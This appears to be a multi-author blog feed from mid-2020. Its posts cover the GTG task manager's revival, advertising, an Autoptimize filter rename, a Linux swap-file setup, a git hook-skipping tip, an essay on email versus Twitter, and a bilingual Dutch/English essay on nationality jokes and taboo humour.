And while I spent 6 years exploring productivity on a Mac, GTG entered hibernation.


Users were not happy. Especially one: Jeff, who was also a community contributor and an open source expert. In 2019, he decided to bring GTG back from the grave. Spoiler: he managed it. He became the heartbeat of GTG, while a talented and motivated developer, Diego, answered his call.

They managed an incredible amount of work and released GTG 0.4. Long may they continue! Video of GTG 0.4.

I didn’t write any code but helped as I could with advice and explanations of the code. It’s a strange feeling to see your own creation continue in the hands of others. It makes me proud. Creating software from scratch is hard. But living to see your software developed by others is quite an accomplishment. I’m proud of what Diego and Jeff are doing. This is something unique to Open Source, and I’m grateful to experience it.

What is funny is that, around the same time Jeff called for a reboot of GTG, I went back to Linux, tired of all the bells and whistles of Apple. I was looking for simplicity, minimalism. It was also important for me to listen to my moral values again. I was missing free software.

In hindsight, I realise how foolish my quest for productivity was. I had spent six years developing software to make myself more productive. When I realised that and swore never to develop productivity software again, I spent the next six years trying every new productivity gadget in search of the perfect combo.

It was enough. Instead of trying to find tools to be productive, I decided to simply do what I always wanted to do. Write.

Changing my perspective led me to the awful realisation that people are not using tools because they are useful but because they are trendy. They rationalise afterwards why they use the tool, but tools are not made to fill real needs. Needs are, instead, created to justify the use of a fun tool. A few years ago, creating a project was all about « let’s create a Slack about the subject ». Last year it was Notion. This year it’s Airtable. When you have a hammer, everything looks like a nail.

After so many years developing and testing every productivity software out there, I can assure you that the best productivity system should, at the very least, not depend on a complex app to access your data. By using Markdown files in a very simple and effective folder structure, I have the most productive system I’ve ever had. A system that could have worked 12 years ago, a system that does not depend on a company or an open source developer. I don’t even need GTG or GNOME anymore. I’m now working fully in Zettlr on Regolith, with a pen and a Moleskine, and I’m able to focus on a couple of big projects at a time.

Jeff would probably say that I evolved from a chaos warrior into a « goldsmith ». At least for the professional part, because I can assure you the parenting part is still fully on the chaos side. Nevertheless, Jeff’s dedication demonstrated that, with GTG, we created a tool which can become an essential part of a chaos warrior’s productivity system. A tool which is useful without being trendy, even years after it was designed. A tool that people still want to use. A tool that they can adapt and modernise.

This is something incredible that can only happen with Open Source.

Thanks Bertrand, Izidor, Parin, Jeff, Diego and all the contributors for the ride. I’m sorry to have been one of those « FLOSS maintainers who disappear suddenly », but I’m proud to have been part of this adventure and incredibly happy to see that the story continues. Long live Getting Things GNOME!

Photo by krisna iv on Unsplash.

I am @ploum, an electronic writer. If you enjoyed this text, feel free to support me on Paypal or in millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Your regular support, even symbolic, is a real motivation and recognition. Thank you!

This text is published under the CC-By BE licence.

July 06, 2020

Advertising isn’t so bad. Sometimes it acts. With its own ethics, it is true.

While it fought for decades against any ban on promoting cigarettes or alcohol, while it keeps trying to make us buy big SUVs and feeds our children soda cans and sugary bars, it picks its battles.

Numerama reports that an advertisement for electric bikes was reportedly censored because it could imply that cars pollute. Advertising picks its battles.

But rest assured, your brain will quickly forget it.

Because to read that article, Numerama will first force you to watch an advertisement for an SUV.

The next time you wonder why nothing is being done about global warming, remember this anecdote. Remember that everything connected, closely or remotely, with advertising is guilty. That even ads for electric bikes will not save us! Advertising is the opposite of education. It reshapes our brains to make them receptive to simplistic messages. The success of the anti-vaxxers, or of those who believe the Earth is flat? Brains trained for years, above all, not to think.

Advertising is everywhere! Even along motor-racing circuits (although at the speed the drivers go, I doubt they have time to read it).

Everyone is guilty: the advertisers, the sponsors, the media, the platforms, and all those who watch ads without actively trying to protect themselves from them.

What? Hardly anyone is left?

That is precisely the problem…

Photo by Ploum on Unsplash. Screenshot contributed by Ledub.


As of the soon-to-be-released Autoptimize 2.7.4, all occurrences of “blacklist” and “whitelist” in the code will be changed into “blocklist” and “allowlist”. There is no impact for users of Autoptimize, everything will work as before.

If, however, you are using Autoptimize’s API, there are two (to my knowledge rarely used) filters that are now deprecated and will be removed at a later stage. `autoptimize_filter_js_whitelist` and `autoptimize_filter_css_whitelist` still work in 2.7.4, but if you’re using them, switch to `autoptimize_filter_js_allowlist` and `autoptimize_filter_css_allowlist` to avoid problems when they are removed in the release after 2.7.4.
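For code hooking the old names, the switch is a one-line rename. A minimal sketch, assuming a hypothetical callback `my_js_allowlist` (whatever your existing whitelist callback receives and returns stays exactly the same under the new name):

```php
<?php
// Hypothetical callback: your existing whitelist logic can be reused
// unchanged, only the filter name it is attached to changes.
function my_js_allowlist( $allowlist ) {
    return $allowlist; // adjust the allowlist here as before
}

// Deprecated as of 2.7.4, removed in the release after it:
// add_filter( 'autoptimize_filter_js_whitelist', 'my_js_allowlist' );

// Forward-compatible replacement:
add_filter( 'autoptimize_filter_js_allowlist', 'my_js_allowlist' );
```

Registering the same callback on the new filter name is all the migration there is; the CSS pair works identically.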

This post is the third in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 04, 2020

Impressed by Ilja Leonard Pfeijffer‘s columns about Corona in Genoa, I read his magisterial “Grand Hotel Europa” during our holiday: about love, an old hotel in the middle of change, the adventurous (and violent) life of Caravaggio, the genius of Damien Hirst, and above all about how Europe is gradually becoming an amusement park for tourists (Venice, but closer to home also Amsterdam or our own Bruges?) while we stare blindly at our own grand cultural heritage without really knowing what it entails.

Admittedly, Ilja occasionally lost me when he delved into, say, cultural-philosophical questions, but that was amply compensated by a strong central thread and a healthy dose of self-mockery. Highly recommended!

After a rough period in which I experienced anxiety myself, this occurred to me a few hours ago:

Nothing turns out to be harder than accepting that there is no danger.

I have decided that this will be the new undertone of this blog. What does that mean, exactly? That a dozen or so of the coming blog posts will keep to that line.

“Clowns to the left of me are prevaricating” (a reference, of course, to the song featured in Reservoir Dogs) is history.

What was the previous one? I probably didn’t think about it this hard back then. Maybe I’d better not do so now either? I think too much about pretty much everything.

So, hence the new subtitle:

Accepteer, dat er geen gevaar is. (“Accept that there is no danger.”)

I made it Dutch, because the only groups interested in my blog are a) you, or b) perhaps State Security. The latter, in that case, has a budget to get things translated, and you already speak Dutch.

All right, yes. There is some danger, of course. But we actually have it rather well under control.

July 03, 2020

July 02, 2020

This post is the second in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

June 30, 2020

I caught myself sending a long email to someone I have been following for several years on social media. I took the time to compose that email. To reread it. To correct it. To refine it. In it I express a simple idea that I could have sent on Twitter, whether by mentioning them or by private message. I tell them, quite simply, that I no longer wish to interact on Twitter.

Taking the time, thinking, rereading myself gave me enormous pleasure. I felt I had brought a little something to the world: a clarification of my ideas, an outstretched hand, a shared avenue of reflection. I had built something intimate, in which I reveal myself.

In trying to regain control of my brain, I had rediscovered, without meaning to, the quaint art of correspondence.

We have forgotten the importance and the simplicity of email. We have forgotten it because we have not taken care of it. We let our mailbox rot under thousands of unsolicited messages; we deliberately perfect the art of filling our inboxes with useless, uninteresting, boring emails, without ever again taking the time to place a useful, crafted, intimate letter there.

We believe email is boring, when it is our thoughts that are darkly deserted. « Whatever is well conceived is clearly said, and the words to say it flow with ease », said Boileau. It is plain that our brains are now infernal shambles, besieged by countless attempts to fill them again and again. Anaesthetised by the quantity of information, we find no escape but consumption.

Wishing to cure my Twitter addiction, I had decided to follow only a few selected accounts in my RSS reader through the Nitter interface. Within a few weeks, a cold truth imposed itself on me: nothing was interesting. We post emptiness, noise. Once the enticing features, the notifications and the comments are stripped away, the raw content turns out to be miserable, sickly. Yet I had selected the Twitter accounts of people who were, by my criteria, particularly interesting and intelligent. Alas! We all wallow in the same mire of indignation at a highly targeted news cycle, sprinkled with self-congratulation. Reduced to a few characters, even the most enriching idea turns into predigested mush designed to populate a hypnotic, uninterrupted scroll.

One evening, as I used my shower to articulate a theoretical concept occupying my mind, I realised with horror that I was thinking in Twitter threads. My mind was splitting my idea into blocks of 280 characters. To make it more digestible, more popular. I was spontaneously optimising certain sentences to make them more « retweetable ».

In exchange for content of wretched quality, Twitter was warping my thoughts to the point of turning my aquatic evening meditation into a semi-conscious quest for petty glory and instant approval. The price paid is unimaginable, exorbitant.

Having blocked all news sites long ago, I decided that Twitter and Mastodon would go on the same diet as Facebook and LinkedIn: follow no one. I now feed my serendipity with longer writing, thanks to the ancient voodoo magic of RSS.

Freed, aired out, the brain suddenly regains flexibility, amplitude. Through a joke on a forum I follow, I gather that some politician has been put in prison. The information assaults me. It occupies an undeserved place in my brain. I did not want to know this useless artefact, soon to be erased from the public consciousness. Like a former smoker suddenly allergic to smoke, my brain can no longer stand the pseudo-informational waste poured into us through every pore, through every screen, through every conversation.

Once rid of this crust of filth, I catch myself thinking. My fingers catch themselves wanting to write rather than refresh a page and react with a prefabricated emotion. Instead of a public display of my egotistical pride dressed up as a substitute for communication, I want to forge texts, stories, to convey information in a broader context, to give it time to exist in the minds of its recipients. And too bad if they are fewer, less inclined to inject me with their dopamine-laden likes.

In front of my mailbox, immaculate thanks to strict observance of my inbox-zero and unsubscribe rules, I will watch for the reply like a teenager waiting for the postman to hand over a perfumed envelope. And if it never comes, my life will go on without my being obsessed by a counter of views, likes or shares.

The decentralised communication tool of web 5.0, 6.0 and 12000.0 already exists. It is email. We simply have not yet really learned to use it. We vainly try to replace it or improve it with heaps of interfaces and multicoloured features, because it exposes the vacuity of our interactions. It lays bare that we ought to make an effort, to change our brain and our will. As long as we strive to produce and consume as much noise as possible in insatiable gluttony, as long as we measure our success with autocratic statistics, no system will let us communicate. Because that is not what we are looking for. Because we have lost ourselves in appearance and quantity, consigning the very idea of quality to oblivion. We criticise the feeble-mindedness and short-termism of our politicians without realising that we are mocking our own reflection.

When we are mature enough to simply want to exchange quality information, we will discover that the solution was right before our eyes. So simple, so beautiful, so elegant, so decentralised.


Photo by Matt Artz on Unsplash


Here are the steps needed to add a new SWAP partition to your Linux machine. This will allocate 2GB of space on your disk and allow it to be used as RAM if your server is running low.
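A minimal sketch of those steps, using a 2 GB swap file (the path `/swapfile` is illustrative) rather than repartitioning the disk, which achieves the same effect:

```shell
# Reserve 2 GB on disk for swap.
sudo fallocate -l 2G /swapfile
# Restrict permissions: swap can hold sensitive memory pages.
sudo chmod 600 /swapfile
# Write the swap signature, then enable it immediately.
sudo mkswap /swapfile
sudo swapon /swapfile
# Make it survive reboots.
echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab
# Verify the new swap space is active.
swapon --show
```

If `fallocate` is unavailable on your filesystem, `dd if=/dev/zero of=/swapfile bs=1M count=2048` does the same job, just more slowly.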

June 29, 2020

This post is the first in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

Quick tip if you want to skip the pre-commit validations and quickly get a commit out there.
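With Git, for instance, skipping the hooks is a single flag (the commit message here is illustrative):

```shell
# --no-verify (short: -n) skips the pre-commit and commit-msg hooks
# for this one commit only; the hooks stay in place for future commits.
git commit --no-verify -m "WIP: hotfix, hooks skipped deliberately"
```

Use it sparingly: the hooks usually exist for a reason, and CI will still catch what they would have.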

June 27, 2020

Cover Image - Chad and Virgin Laughing
"A sense of humour reflects a sense of proportion. It springs into action when a wiser part of us short-circuits a closed mindset."

When I was little, it was the most ordinary thing in Europe to laugh at our international neighbours. We were unofficial rivals, sometimes mutually, sometimes in one direction only, according to the cultural and historical stereotypes of the time.

The 'Hollanders' joked about us:

A Belgian construction worker is helping out across the border in the Netherlands, and sees a Dutchman pouring coffee from his thermos flask.

"What is that?" he asks.
"That's a thermos! If you pour something hot into it, it stays hot. If you pour something cold into it, it stays cold."
"Brilliant! How much do you want for it?"
"You can have it for 25 guilders."

The next day he is back at work in Belgium and proudly shows off his new find to his colleagues.

"This is a thermos! If you pour something hot into it, it stays hot. If you pour something cold into it, it stays cold."
"Wow! And how does that thing know?"

We naturally cracked jokes about them too:

A bus with 50 Dutch holidaymakers is driving to the Costa del Sol and stops at a petrol station in Belgium.

The driver asks the attendant: "Could I get a bucket of water? My engine doesn't cope well with this heat!"

"No problem!" He disappears and returns with a big, sloshing bucket.

"And er... would you happen to have 51 straws?"

Because Belgians (read: Flemings) were stupid, and the Dutch were stingy. These are actually much cleaner jokes than ours, such as:

"How many times does a Dutchman use a condom?"
"Three times. Once the normal way, once inside out, and the third time as chewing gum."

(This was back in primary school, FYI)

But the joke has a karmic inversion:

"How many times does a Belgian laugh at a joke?"
"Three times. Once when you tell it, once when you explain it, and the third time when he finally gets it."

Asterix and Obélix - Map of Gaul

Europa Universalis

A quick Google search reveals that the basic jokes about nationality are extremely pro forma. You can largely just swap or change the countries to get a different joke that was also told at some point. Take this classic joke about the train tunnel:

A nun, a beautiful blonde lady, a German and a Dutchman are sitting together in a train compartment. The train enters a tunnel, it is pitch dark, and suddenly there is a smack. When the train rides back into the light, the German is rubbing his face in pain.

The nun thinks: "That German probably touched the lady, and she rightly rapped him on the knuckles."

The lady thinks: "That German pig tried to grope me, but got the nun by mistake. Good thing she gave him a slap."

The German thinks: "That Dutchman probably couldn't keep his hands to himself, but the blonde thought it was me! The bastard!"

The Dutchman thinks: "Next tunnel, I'll smack that filthy German again!"

The countries are close neighbours, so there is always some stereotypical, historical quarrel at hand. If you change the countries, the joke can also flip, depending on what your prejudices are.

If the Dutchman is the aggressive one, you could read it as revenge for German aggression against the Netherlands. If you tell a version in which the German hits the Dutchman, that might represent unilateral German aggression. The reason the joke is told with nationalities is also the reason it features a nun and a beautiful blonde lady: it adds the necessary colour, so that the characters (and the audience) can immediately jump to all sorts of wrong conclusions.

You think the nationalities matter, but that is never actually said. It misleads you, so you can play along. The real punchline is that you need no elaborate explanation for an outright attack. A joke about national aggression can expose universal themes, through four conflicting perspectives, that also touch all sorts of other sensitive nerves.

You do of course have to keep in mind that the Europe in which such jokes were commonly told was completely different from today's. The hint is in the "25 guilders" of the first joke. This was before the Euro, before the customs union, the Schengen zone, and the modern electric trains that tie it all neatly together. You only had to drive a few hours in any direction to find a place where you needed permission to enter, where you didn't speak the language, didn't know what things cost, didn't know the local laws, and couldn't deal with the authorities on an equal footing. These were also the same people whose ancestors had spent a few centuries slaughtering your ancestors... but they did seem mostly OK now, didn't they?

When you live in such a situation, it is perfectly normal to trivialise it all and crack jokes about it. To pretend it is all far removed from your own bed. To say: if we are all going to be characters in a drama none of us really has much say in, let's at least have some fun with it. Some of these jokes do of course carry an enormous amount of historical and cultural context, for example:

In heaven the cops are British, the chefs French, the mechanics German, the lovers Italian, and it is all organised by the Swiss.

In hell the chefs are British, the mechanics French, the lovers Swiss, the cops German, and it is all organised by the Italians.

That is a spicy summary of roughly 150 million people over a period of at least a century. Those who told such jokes did not do so out of hate. When a Mysterious Stranger actually entered our little village, most people were above all very curious and friendly. You also didn't share these jokes unless you already got along well (or absolutely didn't), so that pretence could be dropped. The target audience was mostly our own tribe, and the goal was precisely to contain the collective unease and fear of the foreign. When you tell someone a joke about their people, you expose something very intimate.

With the Belgians and the Dutch you don't have to look far. Our fear was that they would out-compete us with their superior business sense. Their fear was that they would lose to a people they considered beneath them.

These are universal themes.

Free Rein

It is enormously valuable to hear someone speak without a filter, with or without humour. And I don't mean so that you can mine quotes to paint them black with.

Long ago I was hanging out with new friends who didn't yet know I was gay. They were laughing about their gay housemate. This guy regularly went through enormous amounts of toilet paper, which they tried to explain by connecting it to his presumed sexual activities at the back door. I said nothing, and I certainly didn't feel like an instant coming-out. I just laughed along, and the conversation moved on.

These days, some would find this undoubtedly homophobic. That such humour is narrow-minded and damages the dignity of its target. That such material should be stamped with all sorts of warnings, and that those who speak freely about it must apologise and do penance. That it is not only appropriate but our moral duty to intervene (and thereby make it all revolve around me, how convenient).

I, on the other hand, knew these guys were laughing because they didn't dare raise the subject with the young man in question. You don't just casually discuss someone else's toilet habits. Once you make that connection between humour and taboo, it really isn't so surprising that toilet humour exists.

I also think that if they had known I was gay, they wouldn't have made those allusions, or would have been ashamed of them, and then it would have been an Awkward Situation. Instead, they could raise a difficult question about someone they lived with, and make it legible. I could simply remain "one of the guys" by grasping the rules, the context and the intent. If I want that today, all I have to do is say something funny and crude about gays behind closed doors, to show that it needn't be a dangerous trap.

This is how the LGBT world has handled it for decades. Drag queens, for example, use their humour and mockery as armour, but it is only complete if you can laugh at yourself too. The Adventures of Priscilla: Queen of the Desert (1994) captured this wonderfully:

So I fully recognise myself in that John Cleese quote about how a wiser part of us can short-circuit a closed mindset.

It also underlines once more that humour is utterly contextual, because the whole point is to dance on the edge of what you may say and think. If something is taboo, if something is narrow-minded, that is exactly what comedy chases hardest.

As an example, take two scenes, two years apart. First, the opening of American Pie (1999):

The main character is caught by his conservative parents while masturbating to illicit TV porn. The scene is played largely straight. This was fairly naughty in its day, for a mainstream American film, and reflected the Christian taboos around teenage sex. Especially once you know that the American pie of the title also loses its virginity. It was so memorable that the New York Times ran an opinion piece about it 20 years later. If anyone felt offended back then, it was mostly people who resembled the parents, people who couldn't think or talk about sex without blushing.

Today, however, it is mostly people from the other side of the political spectrum who find this film crude and offensive. The reasons given are the sexism, the gay jokes, and so on. If you believe the press, plenty of people are unhappy, but honestly I think they just wanted an excuse to post a clip of a guy pretending to hump an apple pie.

Far more interesting is how this scene was parodied in Not Another Teen Movie (2001). There is a lot to say about this film, because it masterfully stitches together every 80s and 90s teen-movie cliché. It refuses to take itself seriously precisely by taking its source material dead seriously, with fantastic performances. It opens with a direct homage to American Pie, except that they have blown up literally every aspect of that scene to absurd proportions:

It makes complete sense once you understand how controversial teenage sex and hormonal urges were at the time. Instead of a shy guy with a sock, we get a fearless young lady with her XXL pink vibrator with little flowers on it. Everyone walks into the room, even grandma and the priest. It ends with a whipped-cream bukkake, ushering in the rest of the film. And they just keep going like that, cleverly splicing the source material with an outsize dose of toilet, sex and other humour. It mostly works, with only a few missteps, such as the joke about the Obligatory Black Character, which gets stretched across the entire film.

If you thought the real target was women, or LGBT people, or black people, you completely missed the point. This was a big middle finger aimed at puritanical moral crusaders. At the time, they were also getting worked up about, say, a pair of blue boobs in profile, in a video game they had never played themselves.

The target audience, in any case, found the film hilarious, which is of course what matters most.

The Joke Space

I have mostly used examples that now seem dated, even parochial.

Jokes about international rivals have largely disappeared, because we now know far more about each other. Thanks to open borders and a harmonised economy and body of law, we have a legible continent where everyone can easily compare themselves with everyone else. We no longer need jokes about which country is run best; we can just go and look at the COVID numbers together.

Today you will mostly encounter such humour in the context of an April Fools' prank or "shitposting", like these two memes:


Usually posted by a Dutchman or a Belgian respectively, referring to the Dutch talent for imperialism and the Belgian talent for needless bureaucracy. It signals that a given discussion or space is populated mostly by Dutchmen or Belgians. But it really may only be used ironically, because otherwise it is very tiresome.jpg.

Sexual humour has also largely receded, because the internet gives us pornography and ordinary sex education in abundance, and the basic taboos have disappeared. Instead of a group of students all wondering how gays actually do it, you have a bunch of guys who had a look once, weren't into it, and never thought about it again.

The space of acceptable and popular jokes is thus continuously evolving. It is sometimes said: "To learn who rules over you, simply find out who you are not allowed to criticise." This counts double for "...or whom you are not allowed to laugh at."

This is often and wrongly attributed to Voltaire, but oddly enough it turns out to come from a 1993 essay written by a genuine, actual, unadulterated white nationalist. TIL.

Of course it doesn't matter who said it, only whether it is true. People readily object that it can't be true, because, for example, you are not allowed to mock the mentally disabled, who certainly cannot defend themselves. But that is not right, because such mockery naturally provokes a response from those who do have the power to punish people, namely all sorts of organisations that ostensibly advance the rights of particular groups.

The problem with this is that the system is driven by attention, not by results. The essay The Toxoplasma of Rage, written by recently unmasked blogger Scott Alexander Ocasio-Cortez, describes this in detail. When the choices that are rewarded most are precisely those that attract the most attention, you often amplify the tension between groups instead of reducing it, and you breed more resentment.

It also conflates those who can already get help with those who still need it. As an illustration, something that happened here a while ago: an elderly Jewish woman called an on-call nursing service (if I remember correctly). When the nurse heard she was Jewish, he reproached her with all the collective sins of Israel against Palestine, and was otherwise rude and unhelpful. I only know about it because it was in all the newspapers the next day, after a pro-Jewish organisation had raised the matter.

It would have gone very differently if it had been, say, a homeless person or a drug addict who was treated that immorally. It would be practically impossible for such a person to get that kind of recognition, let alone compensation. Whether you want to call that "ruling" or not, these are two completely different levels of access and service, and the only difference is which group of people you may or may not generalise about.

Another argument against not-Voltaire is comedians like Dave Chappelle or Bill Burr, who were both critical of "cancel culture" and so-called "alphabet people" (LGBTQIAA2+). They ostensibly invited their own downfall, but instead reaped enormous success. Ricky Gervais's near-annual Golden Globes speeches are similar: every time he says he will never be invited back, while taking a room full of enormously rich people down a peg:

These comedians are effectively untouchable; their careers and lifestyles are not at stake. They are multi-millionaires with successful projects on their CVs. That is exactly why they can pull it off. Those without "fuck you money" and a pair of steel balls make themselves a target when they crack such jokes. And there are people with the motivation and the means to answer that. The saying is "who rules over you", not over them.


Ik vind het enorm fascinerend omdat het van humor een soort van "Romulan Neutral Zone" maakt, op de rand van het normale politieke Overton Window. Deze zone is groter en omvat niet alleen wat aanvaardbaar is, maar ook wat betwist wordt. De grappen zijn de kogels, maar het pantser is zelfvertrouwen, geput uit vaardigheid en succes. Komieken spelen dit spelletje iedere show-avond op Nightmare niveau.

De zone omvat net die ideeën waar humor effectief op kan werken. Humor verandert of weerlegt onze wereldbeschouwing met geconcentreerde salvo's van verborgen wijsheid of surrealisme. Maar de knoop moet wel toegankelijk genoeg zijn om te ontwarren. Het bereik van humor wordt beperkt door zijn eigen regels, zoals "Te Vroeg", "Dat is NIET grappig", "Expreslift Naar De Hel Als Ik Lach" of "Ik Snap Het Niet". Dit zijn heel subjectieve grenzen, continu onderhandeld tussen de verteller en het publiek. Als je mij niet gelooft, neem dan de mop over de 51 rietjes, maar vervang "Nederlands" door "Joods".

Als je denkt dat de Joden daarom over jou heersen, dan kijk je niet naar hoe zulke zaken zich effectief uitspelen. Want wat werkelijk over jou heerst is de chronische en ongekalibreerde angst dat je er niet mee aan't lachen bent, die zich in allerlei vormen toont. Dit verklaart waarschijnlijk ook waarom je de mensen moet doen lachen als je ze iets wilt vertellen dat ze niet willen horen, want anders gaan ze je lynchen. Goeie humor is een succesvolle mentale afweer tegen een gedachtengang die te strak en dogmatisch is.

Het verhaal van Mark Meechan is hierbij heel relevant. Dit is de Schot die veroordeeld werd voor "extreem beledigend gedrag" omdat hij zijn hondje aangeleerd had om een hitlergroet te doen als hij "Gas the Jews" zei. Hij heeft altijd gezegd dat hij het puur gedaan had om zijn lief te ambeteren. De "rechtsgang" in dit geval vond dat "context en bedoeling" officieel irrelevant waren voor zulke feiten, wat natuurlijk een atoombom van precedent is. Maar het is nog absurder: in een documentaire van de BBC over deze kwestie, vraagt één van de critici zijn eigen kat ook "Gas The Jews?", die natuurlijk nee zegt "omdat hij goed opgevoed werd". Volgens de uitspraak van het Brits gerecht is die man dus schuldig aan exact hetzelfde misdrijf, en is deze video het enige nodige bewijs.

Ze zagen iemand die grappen maakte die ze beledigend vonden, en dachten dat dit een werkelijke bedreiging vormde voor hun maatschappij. In hun paniek zijn ze dan begonnen met één van de noodzakelijke fundamenten van die maatschappij af te breken. En ze zijn nog steeds bezig.

Het is één grote grap, maar hunne frang is nog niet gevallen.

* * *

Humor is niet zo maar een willekeurige evolutionaire tic, of een zinloze activiteit. Het is een fundamenteel mechanisme dat we zowel individueel als collectief gebruiken om onze rederingen te checken. Humor licht net de grenzen toe van waar we misschien fout bezig zijn, en helpt om fixaties en taboe te doorbreken.

We vinden iets grappig als het ons verrassende en tegenstrijdige signalen geeft, allemaal tegelijkertijd. Als we die snel en juist kunnen uitwerken, en in de grotere wereld kunnen plaatsen, kunnen we iets nieuws en waar leren. Dit wilt ook zeggen dat als de humorpolitie op het toneel verschijnt, dat dit een symptoom is van een collectief gebrek aan begrip, en van onbespreekbare taboes.

Wie pret en spot verbant, verbant uitdagende inzichten, en dat doen we op eigen risico.

Cover Image - Chad and Virgin Laughing
Cover Image - Chad and Virgin Laughing
"A sense of humour is a reflection of a sense of proportion. It occurs when the wiser part of ourselves short-circuits a closed system of thought."

When I was a kid, mocking your international neighbors was the normal thing to do in Europe. What's more, there were unofficial rivalries, sometimes mutual, sometimes one-way, embodying cultural and historical stereotypes.

The Dutch told jokes like this about us:

A Belgian construction worker is helping out across the border in the Netherlands, and sees a Dutchman pour coffee from his thermos.

"What's that?" he asks.
"It's a thermos! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"That's amazing! How much do you want for it?"
"It's yours for 25 guilders."
"I'll take it!"

The next day he's back in Belgium and proudly shows off his new find during lunch.

"It's a thermos! I got it from the Netherlands! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"Wow, that's amazing! How does it know?"

In turn, we told jokes about them:

A bus with 50 jolly Dutch vacationers is driving down to the Spanish coast, and stops by a gas station in Belgium.

The driver asks the attendant: "Could I get a bucket of water? My engine is having some trouble with this blistering heat!"

"No problem at all!" He goes out back and returns with a big sloshing bucket.

"Also... do you happen to have 51 straws?"

It's not very complicated. Belgians were dumb, and the Dutch were stingy. These are actually much cleaner jokes than the ones we told, which included:

"How many times does a Dutchman use a condom?"
"Three times. Once the normal way, once inside out, and the third time as chewing gum."

(This was still in primary school, by the way.)

But this joke has a karmic reverse:

"How many times does a Belgian laugh at a joke?"
"Three times. Once when you tell it, once when you explain it, and the third time when he gets it."

Asterix and Obélix - Map of Gaul

Europa Universalis

A casual search will show that the basic jokes about nationality are so scripted, that you can pretty much substitute any country for any other, and arrive at a joke that has been told some place some time. Like this classic train tunnel joke:

A nun, an attractive blonde, a German and a Dutchman are sitting in a train compartment. The train enters a tunnel, it's completely dark, and suddenly there's a slap. When the train comes out of the tunnel, the German is rubbing his face in pain.

The nun's thinking: "The German man probably touched the blonde woman and she slapped him, and rightfully so."

The blonde's thinking: "That German pervert probably tried to grope me, but got the nun instead, and she slapped him. Good."

The German thinks: "The Dutchman obviously copped a feel on that blonde woman, and she hit me instead of him. That bastard!"

The Dutchman thinks: "Next tunnel, I'm gonna slap that German fucker again!"

The nationalities are close neighbors, and that means there's some sort of stereotypical, historical beef. When you change the countries, the joke's meaning can flip, depending on what your preconceptions are.

For example, when the Dutchman is the aggressor, it could be assumed he is seeking some kind of payback for Germany's aggression against the Netherlands. If you tell the version where a German slaps a Dutchman, he might personify unprovoked German aggression. The main reason the joke gets told with nationalities is the same reason it's a nun and an attractive blonde: it adds necessary color to the situation, so the characters (and the audience) can draw all sorts of wrong conclusions instantly.

It is implied that the nationalities are relevant, but never actually stated. It's misdirection to draw you in. The real punchline is that complicated explanations for simple acts of violence are not necessary. A joke about nationalist aggression can instead let you recognize universal themes, through its 4 contradictory perspectives, which bleed into a host of other sensitive topics.

It's important to know the Europe in which such jokes were routinely told was a very different place. The hint is in the "25 guilders" at the start. We didn't always have the Euro, a Customs Union, Schengen-zone visas, and fancy electric trains that connect it all. You only needed to drive a few hours in any direction to arrive at a place where you needed permission to get in, probably didn't speak the language, couldn't tell how much things cost, didn't know the local laws, and couldn't interact with the authorities. Also, these were the same people whose ancestors murdered your ancestors for the last few centuries, but they seemed okay now?

A natural response to having this right on your doorstep was to trivialize and make fun of it. And pretend it was all far away. As if to say: we're all going to be characters in a drama none of us really had any say in, so we may as well have fun with it. Some of these jokes do capture an immense amount of historical and cultural context, for example:

Heaven is where the police are British, the cooks are French, the mechanics German, the lovers Italian and it's all organized by the Swiss.

Hell is where the chefs are British, the mechanics French, the lovers Swiss, the police German and it's all organized by the Italians.

That's a condensed roast of about 150 million people covering at least a century, give or take. Those who crack such jokes don't do so in malice. When the odd Mysterious Stranger actually walked into our town, most of us would be pretty curious and friendly to them. You also wouldn't tell such a joke in front of them, unless you were on good terms (or really bad terms), and had already dropped much of the pretense. The main audience for this was our own tribe, and the goal was to relieve our collective anxiety and fear of the unknown. Letting people in on your jokes about them meant letting them hear something intimate.

In the case of the Belgians and the Dutch, it's right there in the punchlines. Our worry was e.g. that they'd outcompete us with their business acumen. Their worry was e.g. that they'd fail to win against people they considered backwards.

These are universal themes.

Speak Easy

Getting to hear people speak in an unfiltered manner, humorously or not, is an incredibly valuable thing. And I mean for reasons other than quote mining what they said and making them look bad.

One time, I was over at a house of recent friends who didn't yet know I was gay. They were cracking jokes about their gay housemate. The guy apparently used an enormous amount of toilet paper on the regular, which they were attempting to explain by pointing to his assumed sexual activities through the back door. I didn't say anything, certainly didn't want to "come out" then and there. I just laughed along and the moment passed.

There's a certain perspective today that says this was unambiguously homophobic. That such humor is bigoted and degrading to the dignity of the target demographic. That we need to stamp such material with appropriate content warnings, and that those who say it freely should apologize and do penance. That it is not only appropriate but a moral duty to intervene (and conveniently make it all about me in the process).

I for one knew these guys were cracking jokes exactly because they didn't dare bring it up with the person in question. Asking about someone else's toilet issues is not exactly casual small talk. Once you connect humor with taboos, it's really no coincidence that potty humor is a thing.

I also think that if they had known I was gay, they wouldn't have joked around, or been embarrassed after, and then it would have been a Big Thing. The way it went, a concern about a person they shared a house with could be brought up and made legible. I joined the "one of the guys" dynamic, by understanding its rules, context and intent. I can get the same effect now just by saying something funny and insensitive about gay people behind closed doors, to show that it's not a personal landmine at all.

It's also entirely in line with existing LGBT culture. Drag queens in particular have used sass and mockery as a shield, but no mockery is complete without self-mockery. The Adventures of Priscilla: Queen of the Desert (1994) showed everyone how it's done:

The John Cleese quote about a wiser part short circuiting a closed system of thought sounds dead-on to me.

It also reinforces that humor is entirely contextual, because its goal is to dance on the edge of what is actually permissible to say and think. Whatever the current taboos are, whatever's currently the most closed-minded, that's what comedy is most attracted to.

For a great illustration of this, consider two scenes, two years apart. First, the opening to 1999's American Pie:

The lead character is caught jerking off to illegal TV porn by his conservative parents, and the scene is played mostly straight. Situated in its own time as a mainstream American movie, this was pretty raunchy, and reflected common Christian taboos around teenage sex. Particularly when you factor in the titular American Pie which also ends up losing its virginity. A moment so memorable, NYT dedicated a piece to it 20 years later. If anyone was offended by this at the time, it was people who resembled the parents and found it difficult to think or talk about sex without blushing.

These days though, the people who consider this movie offensive would come from the politically opposite side of the spectrum. Reasons cited include the sexism, the gay jokes, and so on. If you believe the press there's loads of detractors now, but really I think they just wanted an excuse to post a video of a young man pretending to fuck apple pie for the clicks.

